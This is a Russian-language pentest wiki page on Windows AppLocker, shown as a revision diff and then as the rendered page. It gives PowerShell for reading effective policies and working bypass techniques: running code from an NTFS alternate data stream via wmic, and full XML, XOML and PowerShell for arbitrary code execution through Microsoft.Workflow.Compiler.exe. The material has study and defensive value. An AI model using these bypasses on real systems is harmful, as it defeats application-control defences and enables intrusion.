Applocker — различия между версиями
Drakylar (обсуждение | вклад) (Новая страница: «Applocker - функция управления приложениями и политиками по запуску программного обеспечени…») |
Drakylar (обсуждение | вклад) м |
||
Строка 38: | Строка 38: | ||
** APPX | ** APPX | ||
+ | |||
+ | = Общее = | ||
+ | |||
+ | == Получение политики (все юзеры) == | ||
+ | |||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | Get-ApplockerPolicy -effective | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == Получение политики (все группы текущего пользователя) == | ||
+ | |||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | $a = Get-ApplockerPolicy -effective | ||
+ | | ||
+ | $u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value | ||
+ | $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups) | ||
+ | |||
+ | Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){ | ||
+ | $f = 0; | ||
+ | $v = $y.UserOrGroupSid.value; | ||
+ | Foreach ($z in $g){ | ||
+ | if (($z.Value -eq $u) -or ($z.Value -eq $v)){ | ||
+ | $f= 1; | ||
+ | }; | ||
+ | }; | ||
+ | if ($f -eq 1){ | ||
+ | Write-Output $y.PathConditions; | ||
+ | Write-Output $y.Action; | ||
+ | } | ||
+ | }} | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Однострочник | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | $a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};}; | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | = Обход AppLocker = | ||
+ | |||
+ | == Альтернативный канал == | ||
+ | |||
+ | Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его: | ||
+ | |||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | type test.exe > C:\logs:test.exe | ||
+ | wmic process call create '"C:\logs:test.exe"' | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == Интерпретаторы == | ||
+ | |||
+ | * python | ||
+ | |||
+ | * perl | ||
+ | |||
+ | * java | ||
+ | |||
+ | И так далее | ||
+ | |||
+ | == Макросы ворда == | ||
+ | |||
+ | Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код. | ||
+ | |||
+ | == Небезопасные политики == | ||
+ | |||
+ | Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи. | ||
+ | |||
+ | |||
+ | == InstallUtil == | ||
+ | |||
+ | См. [amsi] | ||
+ | |||
+ | == Microsoft.Workflow.Compiler.exe == | ||
+ | |||
+ | |||
+ | test.xml: | ||
+ | <syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll; height: 300px" > | ||
+ | <?xml version="1.0" encoding="utf-8"?> | ||
+ | <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | ||
+ | <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | ||
+ | <d2p1:string>test.xoml</d2p1:string> | ||
+ | </files> | ||
+ | <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | ||
+ | <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | ||
+ | <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable> | ||
+ | <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory> | ||
+ | <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation> | ||
+ | <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName> | ||
+ | <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors> | ||
+ | <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel> | ||
+ | <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||
+ | <d2p1:checkTypes>false</d2p1:checkTypes> | ||
+ | <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode> | ||
+ | <d2p1:compilerOptions i:nil="true" /> | ||
+ | <d2p1:generateCCU>false</d2p1:generateCCU> | ||
+ | <d2p1:languageToUse>CSharp</d2p1:languageToUse> | ||
+ | <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" /> | ||
+ | <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" /> | ||
+ | <d2p1:mtInfo i:nil="true" /> | ||
+ | <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" /> | ||
+ | </parameters> | ||
+ | </CompilerInput> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | text.xoml: | ||
+ | <syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow"> | ||
+ | <CodeActivity x:Name="codeActivity1" /> | ||
+ | <x:Code><![CDATA[ | ||
+ | public class Foo : SequentialWorkflowActivity { | ||
+ | public Foo() { | ||
+ | Console.WriteLine("FOOO!!!!"); | ||
+ | } | ||
+ | } | ||
+ | ]]></x:Code> | ||
+ | </SequentialWorkflowActivity> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Полный фрагмент кода для автоматизации запуска: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll;height:300px;" > | ||
+ | function New-CompilerInputXml { | ||
+ | <# | ||
+ | .SYNOPSIS | ||
+ | Creates a an XML file consisting of a serialized CompilerInput object. | ||
+ | .DESCRIPTION | ||
+ | New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe. | ||
+ | .PARAMETER XOMLPath | ||
+ | Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs. | ||
+ | .PARAMETER OutputPath | ||
+ | Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object. | ||
+ | .EXAMPLE | ||
+ | New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml | ||
+ | Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference. | ||
+ | .EXAMPLE | ||
+ | New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt | ||
+ | Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument. | ||
+ | .OUTPUTS | ||
+ | System.IO.FileInfo | ||
+ | Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created. | ||
+ | #> | ||
+ | |||
+ | [OutputType([System.IO.FileInfo])] | ||
+ | param ( | ||
+ | [String] | ||
+ | [ValidateNotNullOrEmpty()] | ||
+ | $XOMLPath = 'test.xoml', | ||
+ | |||
+ | [Parameter(Mandatory = $True)] | ||
+ | [String] | ||
+ | [ValidateNotNullOrEmpty()] | ||
+ | $OutputPath | ||
+ | ) | ||
+ | |||
+ | # This assembly won't be loaded by default. We need to load | ||
+ | # it in order to get access to the WorkflowCompilerParameters class. | ||
+ | Add-Type -AssemblyName 'System.Workflow.ComponentModel' | ||
+ | |||
+ | # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe | ||
+ | $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters | ||
+ | |||
+ | # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[]) | ||
+ | $WFCompilerParams.GenerateInMemory = $True | ||
+ | |||
+ | # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from | ||
+ | $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe' | ||
+ | |||
+ | # Load the assembly | ||
+ | $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath) | ||
+ | |||
+ | # This is the helper method that will serialize the CompilerInput object to disk | ||
+ | $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static') | ||
+ | |||
+ | $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath))) | ||
+ | |||
+ | Move-Item $TempFile $OutputPath -PassThru | ||
+ | } | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb | ||
+ | |||
+ | |||
+ | = Ссылки = |
Версия 14:50, 16 марта 2022
Applocker - функция управления приложениями и политиками по запуску программного обеспечения в Windows.
Позволяет управлять:
- Исполняемые файлы
- EXE
- COM
- Скрипты
- JS
- PS1
- VBS
- CMD
- BAT
- Установочные файлы
- MST
- MSI
- MSP
- Библиотеки
- DLL
- OCX
- Упакованные приложения
- APPX
Содержание
Общее
Получение политики (все юзеры)
1 Get-ApplockerPolicy -effective
Получение политики (все группы текущего пользователя)
1 $a = Get-ApplockerPolicy -effective
2
3 $u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
4 $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
5
6 Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
7 $f = 0;
8 $v = $y.UserOrGroupSid.value;
9 Foreach ($z in $g){
10 if (($z.Value -eq $u) -or ($z.Value -eq $v)){
11 $f= 1;
12 };
13 };
14 if ($f -eq 1){
15 Write-Output $y.PathConditions;
16 Write-Output $y.Action;
17 }
18 }}
Однострочник
1 $a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};
Обход AppLocker
Альтернативный канал
Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его:
1 type test.exe > C:\logs:test.exe
2 wmic process call create '"C:\logs:test.exe"'
Интерпретаторы
- python
- perl
- java
И так далее
Макросы ворда
Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.
Небезопасные политики
Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.
InstallUtil
См. [amsi]
Microsoft.Workflow.Compiler.exe
test.xml:
1 <?xml version="1.0" encoding="utf-8"?>
2 <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
3 <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
4 <d2p1:string>test.xoml</d2p1:string>
5 </files>
6 <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
7 <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
8 <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
9 <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
10 <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
11 <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
12 <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
13 <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
14 <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
15 <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
16 <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
17 <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
18 <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
19 <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
20 <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
21 <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
22 <d2p1:checkTypes>false</d2p1:checkTypes>
23 <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
24 <d2p1:compilerOptions i:nil="true" />
25 <d2p1:generateCCU>false</d2p1:generateCCU>
26 <d2p1:languageToUse>CSharp</d2p1:languageToUse>
27 <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
28 <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
29 <d2p1:mtInfo i:nil="true" />
30 <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
31 </parameters>
32 </CompilerInput>
text.xoml:
1 <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
2 <CodeActivity x:Name="codeActivity1" />
3 <x:Code><![CDATA[
4 public class Foo : SequentialWorkflowActivity {
5 public Foo() {
6 Console.WriteLine("FOOO!!!!");
7 }
8 }
9 ]]></x:Code>
10 </SequentialWorkflowActivity>
Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его:
1 C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml
Полный фрагмент кода для автоматизации запуска:
1 function New-CompilerInputXml {
2 <#
3 .SYNOPSIS
4 Creates a an XML file consisting of a serialized CompilerInput object.
5 .DESCRIPTION
6 New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
7 .PARAMETER XOMLPath
8 Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
9 .PARAMETER OutputPath
10 Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
11 .EXAMPLE
12 New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
13 Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
14 .EXAMPLE
15 New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
16 Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
17 .OUTPUTS
18 System.IO.FileInfo
19 Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
20 #>
21
22 [OutputType([System.IO.FileInfo])]
23 param (
24 [String]
25 [ValidateNotNullOrEmpty()]
26 $XOMLPath = 'test.xoml',
27
28 [Parameter(Mandatory = $True)]
29 [String]
30 [ValidateNotNullOrEmpty()]
31 $OutputPath
32 )
33
34 # This assembly won't be loaded by default. We need to load
35 # it in order to get access to the WorkflowCompilerParameters class.
36 Add-Type -AssemblyName 'System.Workflow.ComponentModel'
37
38 # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
39 $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
40
41 # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
42 $WFCompilerParams.GenerateInMemory = $True
43
44 # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
45 $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
46
47 # Load the assembly
48 $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
49
50 # This is the helper method that will serialize the CompilerInput object to disk
51 $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
52
53 $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
54
55 Move-Item $TempFile $OutputPath -PassThru
56 }
Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb